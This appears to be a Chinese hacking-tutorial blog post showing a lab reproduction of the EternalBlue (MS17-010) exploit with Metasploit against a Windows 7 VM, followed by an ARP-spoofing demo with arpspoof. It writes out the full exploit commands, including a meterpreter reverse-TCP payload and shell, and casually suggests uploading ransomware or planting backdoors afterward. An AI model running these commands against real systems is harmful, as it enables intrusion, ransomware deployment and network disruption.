ARP欺骗&&永恒之蓝复现

永恒之蓝复现

基础知识介绍

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议TCP139端口和TCP445端口。

实验准备

靶机:win7(关闭防火墙)IP:192.168.147.132
攻击机:Linux kali IP:192.168.147.130

实验步骤

打开kali,启用我们的工具 Metasploit

msfconsole 
ARP欺骗&&永恒之蓝复现

每次启动msfconsole的界面都不同。

利用msf的 auxiliary 模块进行漏洞验证

search ms17-010 
ARP欺骗&&永恒之蓝复现
use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.147.132 set rport 445 run 
ARP欺骗&&永恒之蓝复现

用来查看靶机是否存在ms17_010的漏洞(这里要关闭靶机的防火墙,我被按这好久)

由此可见,存在漏洞
然后就可以尝试攻击了

use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.147.132   //设置攻击目标 set payload windows/x64/meterpreter/reverse_tcp    // 设置线程 set lhost 192.168.147.130   // 设置攻击机的ip exploit    // 发起攻击 

这里注意,仅支持攻击win7 x64位的
ARP欺骗&&永恒之蓝复现

这样就算攻击成功了。

sysinfo 
ARP欺骗&&永恒之蓝复现

查看系统信息

反弹shell

shell 

https://blog.ARP欺骗&&永恒之蓝复现

这么搞就算是漏洞复现成功了
之后就能上传东西了,可以上传勒索病毒一类的东西 参考:链接

也能后门植入,方便下次访问:附上文章链接
还能kali生成木马程序,并进行监听 参考链接

总结

这次漏洞复现受益良多,但是这种类型的漏洞复现条件比较苛刻,再加上现在大多数win7电脑都有永恒之蓝的补丁,只要不关闭防火墙,永恒之蓝就不会得逞

ARP欺骗

什么是ARP

ARP通过目标IP确定目标MAC地址,连接来保证通信

什么是ARP欺骗

假设A,B,C,和邮递员。A,B相互通信C想知道通信内容,即C冒充邮递员,给A,B说他是邮递员, 进而得知通信内容。
即:C将自己的IP地址发送到A,A通过ip地址确定MAC地址,进行通信,被C劫持,无法到达B或者到达B的时间较慢,故达到断网或者限速的目的。

准备工作

攻击机:kali linux
靶机:window7
靶机IP:192.168.147.129
默认网关:192.168.147.2
ARP欺骗&&永恒之蓝复现

kali中安装dsniff
其中包含arpspoof,urlsnarf

sudo apt-get install dsniff  

实操

arpspoof -i eth0 -t IP               网关  arpspoof -i eth0 -t 192.168.147.129  192.168.147.2   
ARP欺骗&&永恒之蓝复现
可以看到命令已经生效
ARP欺骗&&永恒之蓝复现
ARP欺骗&&永恒之蓝复现

版权声明:玥玥 发表于 2021-07-21 16:54:59。
转载请注明:ARP欺骗&&永恒之蓝复现 | 女黑客导航